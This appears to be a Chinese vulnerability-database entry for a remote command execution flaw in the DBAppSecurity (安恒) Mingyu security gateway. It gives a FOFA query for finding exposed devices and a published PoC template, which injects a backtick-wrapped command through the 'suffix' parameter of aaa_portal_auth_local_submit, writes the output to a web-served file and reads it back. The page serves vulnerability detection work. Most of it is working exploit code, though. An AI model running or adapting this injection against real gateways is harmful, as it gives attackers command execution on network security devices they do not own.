dbappsecurity-mingyu-aaa-portal-auth-local-submit-rce: 安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: 安恒 明御安全网关 | POC: 已公开

漏洞描述

安恒 明御安全网关 aaa_portal_auth_local_submit 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限 FOFA: body="/webui/images/basic/login/" && title=="明御安全网关"

PoC代码[已公开]

id: dbappsecurity-mingyu-aaa-portal-auth-local-submit-rce

info:
  name: 安恒 明御安全网关 aaa_portal_auth_local_submit 远程命令执行漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    安恒 明御安全网关 aaa_portal_auth_local_submit 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限 
    FOFA: body="/webui/images/basic/login/" && title=="明御安全网关"
  tags: dbappsecurity,mingyu,rce
  created: 2023/09/05

set:
  r1: randomLowercase(10)
rules:
  r0:
    request:
      method: GET
      path: /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix=%60id+%3E/usr/local/webui/{{r1}}.txt%60
    expression: response.status == 200 
  r1:
    request:
      method: GET
      path: /{{r1}}.txt
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()

相关漏洞推荐